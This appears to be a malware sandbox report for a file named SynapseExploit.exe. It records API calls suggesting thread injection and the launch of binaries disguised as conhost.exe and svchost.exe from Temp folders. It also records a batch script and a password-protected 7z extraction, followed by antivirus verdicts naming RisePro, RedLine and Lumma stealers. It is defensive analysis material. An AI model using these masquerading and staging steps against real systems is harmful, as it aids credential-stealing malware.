NtSetContextThread Dec. 11, 2023, 7:15 p.m.	registers.eip: 2005598660 registers.esp: 2554036 registers.edi: 0 registers.eax: 4382702 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000144 suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x000001bc suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000200 suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 2116	1	0
NtGetContextThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000148	1	0
NtGetContextThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000148	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000148 suspend_count: 1 process_identifier: 2116	1	0
NtGetContextThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000148	1	0
NtGetContextThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000148	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000148 suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x000002a0 suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x000002b4 suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x000004b4 suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x000006dc suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000704 suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x0000076c suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x0000078c suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x000007a4 suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x000007c0 suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x000007dc suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x000007f8 suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000830 suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000854 suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x0000086c suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x00000888 suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x000008dc suspend_count: 1 process_identifier: 2116	1	0
NtResumeThread Dec. 11, 2023, 7:15 p.m.	thread_handle: 0x000002b4 suspend_count: 1 process_identifier: 2116	1	0
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2900 thread_handle: 0x00000374 process_identifier: 2896 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\conhost.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\conhost.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\conhost.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000394	1	1
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2944 thread_handle: 0x000007a0 process_identifier: 2940 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\svchost.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\svchost.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\svchost.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006c8	1	1
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 3020 thread_handle: 0x000002cc process_identifier: 3016 current_directory: C:\Users\test22\AppData\Roaming\temp filepath: track: 1 command_line: "C:\Users\test22\AppData\Roaming\temp\main.bat" /S filepath_r: stack_pivoted: 0 creation_flags: 67634176 (CREATE_DEFAULT_ERROR_MODE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002c0	1	1
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2056 thread_handle: 0x000000000000006c process_identifier: 2064 current_directory: C:\Users\test22\AppData\Roaming\temp filepath: C:\Windows\System32\mode.com track: 1 command_line: mode 65,10 filepath_r: C:\Windows\system32\mode.com stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000068	1	1
CreateProcessInternalW Dec. 11, 2023, 7:16 p.m.	thread_identifier: 2160 thread_handle: 0x0000000000000068 process_identifier: 2144 current_directory: C:\Users\test22\AppData\Roaming\temp filepath: C:\Users\test22\AppData\Roaming\temp\7z.exe track: 1 command_line: 7z.exe e file.zip -p32606511521849235062050926056 -oextracted filepath_r: C:\Users\test22\AppData\Roaming\temp\7z.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000006c	1	1

File has been identified by 55 AntiVirus engines on VirusTotal as malicious (50 out of 55 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.RisePro.i!c
Elastic	malicious (high confidence)
DrWeb	Trojan.PWS.Lumma.63
MicroWorld-eScan	Trojan.Agent.GIAK
FireEye	Trojan.Agent.GIAK
Skyhigh	GenericRXWL-UB!2CD9B5D48C09
McAfee	GenericRXWL-UB!2CD9B5D48C09
Malwarebytes	Trojan.Injector
K7AntiVirus	Trojan ( 005add031 )
Alibaba	TrojanPSW:Win32/Injuke.ecc25b05
K7GW	Trojan ( 005add031 )
Cybereason	malicious.bbc1dc
Symantec	Trojan.Gen.MBT
ESET-NOD32	a variant of Win32/Kryptik.HVHC
APEX	Malicious
ClamAV	Win.Malware.Botx-10004968-0
Kaspersky	HEUR:Trojan-PSW.Win32.RisePro.gen
BitDefender	Trojan.Agent.GIAK
NANO-Antivirus	Trojan.Win32.RisePro.keevuv
Avast	Win32:CrypterX-gen [Trj]
Tencent	Trojan-PSW.Win32.Risepro.kb
Emsisoft	Trojan.Agent.GIAK (B)
F-Secure	Trojan.TR/AD.RedLineSteal.ckfuw
VIPRE	Trojan.Agent.GIAK
TrendMicro	TrojanSpy.Win32.REDLINE.YXDLHZ
Sophos	Troj/Krypt-ACX
Ikarus	Trojan.Win32.Crypt
Jiangmin	TrojanSpy.Stealer.ajhx
Webroot	W32.Trojan.Gen
Varist	W32/Kryptik.KYF.gen!Eldorado
Avira	TR/AD.RedLineSteal.ckfuw
Antiy-AVL	Trojan/Win32.Kryptik.hvhc
Kingsoft	Win32.Trojan-PSW.RisePro.gen
Microsoft	Trojan:Win32/Injuke.RB!MTB
Gridinsoft	Malware.Win32.RedLine.tr
Xcitium	Malware@#1d2jpjcfqq4wu
Arcabit	Trojan.Agent.GIAK
ViRobot	Trojan.Win.Z.Kryptik.1199672.BG
ZoneAlarm	HEUR:Trojan-PSW.Win32.RisePro.gen
GData	Win32.Trojan.PSE.14OXGBD
Cynet	Malicious (score: 100)
AhnLab-V3	Malware/Win.Generic.R622440
VBA32	BScope.TrojanPSW.Stealerc
ALYac	Trojan.Agent.GIAK
MAX	malware (ai score=80)
Cylance	unsafe
Panda	Trj/Genetic.gen
TrendMicro-HouseCall	TrojanSpy.Win32.REDLINE.YXDLHZ
Rising	Stealer.RisePro!8.176E1 (TFE:1:hpboKKkYxtC)

SynapseExploit.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All